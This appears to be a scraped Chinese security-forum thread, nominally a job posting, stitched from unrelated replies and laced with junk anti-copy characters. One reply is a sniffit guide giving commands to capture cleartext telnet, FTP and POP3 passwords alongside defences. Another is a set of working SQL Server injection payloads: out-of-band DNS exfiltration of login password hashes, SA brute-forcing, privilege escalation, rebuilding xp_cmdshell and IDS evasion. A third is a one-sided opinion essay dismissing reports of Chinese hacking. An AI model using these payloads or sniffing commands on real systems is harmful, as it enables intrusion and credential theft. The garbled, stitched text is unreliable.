最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 人人网招聘安全工程师

提示: 作者被禁止或删除 内容自动屏蔽
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:vini5发表,本帖发表者vini5符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者vini5和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Sniffit常见问题及防范策略分析<br>1. sniffit 既是个优秀的管理工具也是个危险的侵入工具。可被管理员用来检查网络中到底传输了些什么,学习各种tcp/ip协议的工作方法,也能被攻击者利用,主要是记录密码。 ; r1 N  l, h. T+ d* ]
<P></P>
, F6 o  }. j( J( ?, H- E3 t( X<P>  2. 工作原理: 为什么能检查密码和不是传送给自己的数据呢? </P>
2 B- o- }  O$ ~8 q4 p1 R6 k) j& {5 D- u<P>  在典型的LAN环境中,(指共享式HUB上连接的两个用户A和B),基于共享式HUB的工作原理,用户A发出的所有tcp/ip请求在HUB的每个端口上广播,正常情况下,B不接收这些目标地址不是自己的数据,但是一旦我们在B机上运行sniffit一类的监听工具,就能置网卡于第三种叫混杂模式的状态下(前两种为tcp,udp模式),在该状态下,网卡接受所有的数据,不管是发给自己的,还是不发给自己的,都被网卡接收并直接传给最上层应用层,交由相应的软件如sniffit处理。 </P>2 ~- I5 ?) P! X  [
<P>  3。常见用法 </P>: r4 f" t  z" }" o6 _
<P>  a. 检测telnet/ftp/pop3密码: </P>4 z" u# ~5 E  S
<P>  #sniffit -a -A. -p 23 -b -t 192.168.11.@ </P>
( w5 Q4 e1 S3 U% i& ^<P>  #sniffit -a -A. -p 110 -b -t 192.168.11.1 (pop3 server) </P>
, d1 D2 L0 f! g) p, @3 i9 \<P>  b. 查看http头信息 </P>2 o6 n* @4 O+ p9 h
<P>  #sniffit -a -A. -p 80 -b -s 1.2.3.4 (1.2.3.4是防火墙外部地址) </P>- o6 h5 B5 C+ |2 @
<P>  c. 记录输出到文件 </P>
4 `; y+ d+ @' F% @( Q<P>  #sniffit -p 21 -l 0 -b -s 192.168.11.2 </P>( l1 m2 Y$ P' c, |2 V3 s6 [" B
<P>  d. 查看icmp消息 </P>6 f0 W1 h( x0 `; X2 E) r/ w
<P>  #sniffit -p icmp -b -s 192.168.1.2 </P>
. Z2 }9 t4 r7 n' K<P>  e. 交互式界面 </P>/ G% M: n: w+ `  m  i! K" [
<P>  #sniffit -i </P>
' z, D5 @! Y% L1 p<P>  f. 检查本网段内发出名字广播的机器 </P>5 U) G3 k4 l$ [7 L1 W& |" c4 V
<P>  #sniffit -a -A. -P udp -p 137 -b -s 192.168.11.255 </P>. O5 i8 a8 V1 T7 Z: t% i
<P>  g. 注意防火墙的情况 </P>
! Y8 s: }0 W+ p7 W<P>  若要检查防火墙内部网卡上的包eth1,可能你要设置 -F eth1参数,因为默认地sniffit 假设为eth0 ) </P>+ ]+ i- u5 \( t5 Q0 F
<P>  4.哪些信息是敏感的和易被检测的? </P>7 O& C$ \" z$ K! l  S) g; m+ y
<P>  telnet/ftp/pop3的密码都是明文传送的,都是易被检测的,apache的基本方式的用户名/密码认证也是UU编码后的口令,也是易被检测的。 </P>2 V8 x" T$ ]  d/ T2 q, b, K
<P>  5. 怎样阻止? </P>: k+ }* B7 f" Z5 u0 U, u6 h
<P>  硬件: 不要用普通的共享式HUB,用交换机来代替它,目前只有交换机和路由器能阻止sniffit的作用 </P>
& A5 q: y0 P( g1 w5 w0 ^<P>  软件: 用带加密功能的tcp/ip连接,象ssh/scp全面代替telnet/ftp/pop3,用MD5方式的apache认证 </P>
: g+ L0 V1 o! U; q<P>  6。作用范围: </P>; U4 j6 d6 v4 a5 n; S
<P>  仅在逻辑子网内有效,不能跨子网,因为广播不被路由器传递,但若是在服务器上运行sniffit,则任何方法均无效,对防火墙来说,通常sniffit攻击是第二层攻击,就是先得到一个普通帐号进入再探寻更多 </P>
- Z  o* ^% u% u0 Y<P>  7. 怎样判断是否有人在用sniffit? </P>2 }% ~, ^  r3 ?: G2 W+ Q
<P>  可检测网络接口(ifconfig)看是否处于混杂模式来确认是否被侵入并安装了sniffit,只限本机。<BR></P>
. m* U4 M  ], Z% J. y( S
& {0 _) n# _: F: f) G+ C- `/ A( M5 k+ R# O" n' B4 ]+ Q

  z& \* L) m# J4 i+ d
  ]0 {- {' R3 g+ ?' w7 h+ M+ Z$ c3 J8 F' d/ O# O7 t9 H

2 a  C% a8 G9 u4 J6 r: a' U7 |1 L/ L  {" r' v. ]; B
# |' h2 P7 z3 y: w* i

2 U: D2 F3 K3 c2 l, _+ k9 X% p+ F2 R; Z" |6 Y+ |: M* A2 ^0 v6 r' J
: }0 B; g. `2 h5 T+ O

- ?2 p8 e9 i8 w# B
3 B6 h& j5 M  Q0 K9 l& r/ ?, j* G; W. M* D1 k1 o0 i
# L* _+ c/ d2 d7 M! C# P
+ D% |9 x$ J4 D- o  N) c8 P
. ]. Q; v! g% R( M: F, b5 |
( ]& c- m4 e9 c9 u$ D1 F
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

mickey:Advanced SQL Injection学习笔记
1.
  ~/ l' O1 }- c& A  Yinband(基于错误回显)
# R8 W0 M! {8 R( g$ m) Z2 E* q; ^http://victim/page.asp?id=1 or 1=convert(int,(USER)))–
# p  G( p0 x7 b0 q3 Vhttp://victim/page.asp?id=1 or 1=convert(int,(@@servername)))–2 @2 E  O- l$ D- \% J8 D. V" e3 ~
http://victim/page.asp?id=1 or 1=convert(int,(@@version)))–! L, s: O! O" ?
http://victim/page.asp?id=1 or 1 in (select db_name(5))–

" M& o* \" N2 `( ]- o9 F
out-of-band(通过dns)
9 O! S% t! E8 y& u9 u+ s7 x) ^  Yhttp://victim/page.asp?id=1;declare @host varchar(800);select @host=name+’-'+master.sys.fn_varbintohexstr(password_hash)+’.sql.pentest.cc’ from sys.sql_logins;exec(‘xp_fileexist “\’+@host+’c$oot.ini”‘);–

- K$ u# y8 S( n; S+ y% R8 X4 W8 L% _
bind sql injection
  Z, ]2 G$ f# k7 g9 Y
http://victim/page.asp?id=1;if+not(select+system_user)+<>’sa’+waitfor+delay+’0:0:5′–

" [( y2 L, H& m; v! a& d
2.# T: |6 Z' j, s& o- c  O4 j2 o7 S
http://victim/page.asp?id=1 having 1=1–   整型注入
4 x+ x" }* {$ X5 j- ghttp://victim/page.asp?id=1′ having 1=1–  字符型注入

' a9 |6 Y* g2 T
3.& J! ?0 ~# l, G7 t8 F4 g
http://victim/page.asp?id=1;select * from openrowset(‘SQLOLEDB’,”;’sa’;'mickey’,'waitfor delay “0:0:50″,select 1;’);&amp;a=1  (暴力猜解SA密码)

8 R% I4 K- a1 q: x8 C
http://victim/page.asp?id=1;select * from openrowset(‘SQLOLEDB’,”;’sa’;'mickey’,'exec master..sp_addsrvrolemember “sa”,”sysadmin”;select 1′);&amp;a=1 (添加当前用户到sysadmin组)

0 M. a) ~: w# i6 h& Z
http://victim/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select  1;exec master..sp_dropextendedproc ”xp_cmdshell”;’)&amp;a=19 B, i5 m: F6 E0 ^, W
http://victim/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select 1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE @OLEResult=sp_OACreate ”WScript.Shell”,@ShellID OUT IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR(”CreateObject %0X”,14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,”Run”,Null,”ping -n 8 127.0.0.1”,0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR (”Run %0X”,14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID’);&amp;a=1 (sql server 2000重新构造xp_cmdshell的方法)
" ?# _: I7 y0 G6 a, [
http://[site]/page.asp?id=1;select * from OPENROWSET(‘SQLOLEDB’,”;’sa’;'j0e’,’select 1;exec master..sp_configure ‘’show advanced options”,1;reconfigure;exec. a0 i* E) a% X8 s! ]
master..sp_configure ”xp_cmdshell”,1;reconfigure’)&amp;a=1: W# N; J3 q6 U5 m1 M
http://[site]/page.asp?id=1;exec master..sp_configure ’show advanced options’,1;reconfigure;exec master..sp_configure ‘ole automation procedures’,1;reconfigure;&amp;a=1(sql server 2005重新构造xp_cmdshell的方法)
  T) _; B, z4 Y
4.' u( V0 T/ d% N: [/ c( F/ ~
使用URL编码和在注释中加入任意字符来绕过IDS

$ n5 N( Y1 e' a9 m; h8 A2 m& [
http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/%72/*how*/)%2D%2D
' r9 Q' T, j4 _/ e) S

8 L, C0 d0 q8 }2 t) p
7 |. R. F* C  B- ]& a# T& Y" {3 N6 p' q- I7 e" a9 t

2 D+ F7 ?* Q9 F! e4 W  {
7 P- B' |, o3 d2 f5 T; v0 L& I6 X/ w: {+ S# i( N  V
' ?! m+ u$ p/ x- R% Y
( N5 w% M, v0 b3 |  Y8 @

+ j) F; x: g& m6 M3 z3 C) w
: Z1 N- _2 W" c& Y8 ?
  `" y+ D; U! G& X; {- k5 n
9 |6 z1 q: p/ y6 n$ V% E" r/ K
7 A6 H$ j% n1 a9 C$ N$ L+ R0 T3 h( D& `5 h" R
  j; ^1 a& [4 r1 a$ y7 k3 N
2 P/ u' _, ]; f" V2 O
# Y9 A) h5 L- M9 b6 B# r

! f4 N& i# L/ P
9 |: X. B1 e$ ^0 `$ m% a) @公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

中国黑客缘何被关注
郑若麟 (巴黎)资深媒体人   最近一段时间以来,有关中国“黑客”的报道甚嚣尘上,令人难以置信。耐人寻味的,不是“黑客”本身;中国和所有互联网发展迅猛的国家一样,都会出现黑客之类的网络“异类”,都会存在网络犯罪行为。中国存在着“黑客”,就好像中国人也会感冒一样,没有丝毫值得大惊小怪的。但为何中国的黑客就如此受到国际媒体的“关照”呢?其背景和目的究竟是什么?这无疑是值得我们思考的。

$ @! i0 X+ j( N+ [; p8 W- h/ A/ O4 w
  这次“黑客风潮”是从德国《明镜》周刊开始的。那是在8月底。《明镜》周刊声称从“可靠消息来源”获悉,中国黑客入侵了德国总理府,并以很大篇幅详细报道中国“黑客”是如何向德国有关机构网络植入“木马”软件,以窃取甚至“控制”德国网络的。紧接着,9月4日,英国《金融时报》又“根据美国五角大楼的匿名消息”来源称,“中国人民解放军的黑客入侵了五角大楼”。《泰晤士报》更是捕风捉影地说,中国入侵五角大楼是为了“控制美国航母系统”。更令人难以置信的是,9月5日,英国《卫报》说,“中国黑客入侵英国政府系统”,好像中国黑客与美、德“为敌”还不够,还要加上英国。三天后,历来“不甘落后”的法国也加入这一“大合唱”:《世界报》引用法国国防部秘书长德龙的话说,中国黑客“入侵法国政府电脑系统”……给人感觉是,似乎这些媒体都在比“谁从阿Q身上抓到的跳蚤更大、咬上一口更响”!
$ |6 V/ S5 B1 v+ }
  一时间,全球网络大有被中国黑客“全面入侵和控制”的态势,给人的感觉真是“仿佛天空在燃烧”、“大战正在虚拟世界激烈地进行之中”……如果是不入流小报的报道,倒不必给予太多关注,至多作为茶余饭后的消遣话题。然而这些媒体都是西方各国的一流“正经”报刊,这就不能不令人吃惊了。

% Y- f$ e  S. i5 E! w/ H
  仔细研读这些报道时,可以发现欧美官方与媒体说辞上三个非常明确的差异:一是各国官方大多对此保持低调或沉默,各国媒体则以高调、密集型轰炸式来报道;二是各国官方或表示“入侵源是中国的某个网站”,或称“有可能来源于中国”,但没有人敢于认定是中国政府或军队所为;但西方媒体则根本就用“中国军方入侵美国五角大楼”这样的从严格意义上来说是误导性的、甚至是错误的标题;三是没有任何一个国家的官方表示遭到入侵的网站拥有保密内容或国家机密遭到非法盗窃,而媒体则相反,大肆渲染“大量机密被窃”、“国家损失惨重”等耸人听闻的消息。
6 E1 k4 V& @! C
  由此三个差异,就可以看出,这是一场蓄意谋划的恶毒诽谤和攻击,与事实没有任何关联。之所以欧美官方低调处理,是因为他们心里很清楚,并不存在“中国黑客大肆攻击西方各国”的事实。法国国际战略分析研究所所长杰雷在接受我一次采访时说,每天攻击五角大楼的黑客事件高达数千起,而且绝大部分来源于美国自身的黑客,怎么能够将区区一点来自中国黑客的攻击,就渲染成“世界大战”呢?更何况,所谓中国黑客的攻击也是没有事实根据的。
9 ^, c+ `& l4 v- l; }/ H+ ~
  那么为何会出现这样一种明显的抹黑行动,而且全球一致、协调行动呢?孤立地看,德国《明镜》选择了默克尔访华前夕、入侵五角大楼消息的披露是在布什与胡锦涛会晤前夕……似乎都是“偶然”的。然而实质上却与近年来国际上一小撮对中国高速发展感到“威胁”的某些势力对中国的“围剿”是一致的。对中国形象“抹黑”的战略是其中一个重要组成部分,从一个领域到另一个领域,几乎没有遗漏。其核心,是想摧毁中国近三十年来通过经济高速发展和社会进步而在国内特别是国际上重塑的“中国模式”所带来的所谓“北京共识”。这一共识已经成为当今世界发展模式的一个范本。
" R$ y; ]' h+ m0 i/ n  \
  冷战结束后,世界上除了少数发达国家周边的东欧国家外,大多数国家并未在“华盛顿共识”下获得“冷战胜利红利”。特别是非洲国家,今天非洲国家更多的接受的,恰恰是“北京共识”。如果中国模式在世界其他地区大量被“复制”的话,将对现存国际体系形成某种冲击。由此来看,这股“黑客风潮”并非偶然。用杰雷的说法,不仅并非偶然,而且还是一个预兆:我们还将看到其他形形色色的各类“风潮”,特别是在北京奥运前夕……

4 L0 E7 e. m+ Q6 B+ L
  仅此而已,岂有他哉?
. K9 \+ Z6 Z- h& A! n/ N1 ?

/ Y$ o. k' K' d6 m) |3 g% v% E: Z' |' n% a

! L) {0 C; l* A/ N$ g1 j
/ J" n( X0 d5 m2 X$ `# ~9 g
0 v5 W4 h1 o7 t( W: A# ?
0 E% E- }! s4 F! {. ^  k. t
4 z% w9 K6 s( n; L  y- Z2 ^
$ t5 q) F% y" F% u' \5 Z& F' P
. o* S9 z" o. Q, O
8 a! D5 x- }( b3 N. u: |/ `5 a$ N$ e6 U0 O

4 Q7 ?  O$ j* ]
3 V& C! t2 W5 N0 K8 h; E
9 w0 ^0 r0 ~" m+ J9 ^9 r% `0 s" [( [& g( W
4 P  W: r4 C& C# S/ z: F1 h2 L

- T9 I% E' J6 z% `7 ^' }$ U& e2 X6 y: V8 u) f3 u* F
/ f. b, ?# w7 u' h& F
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表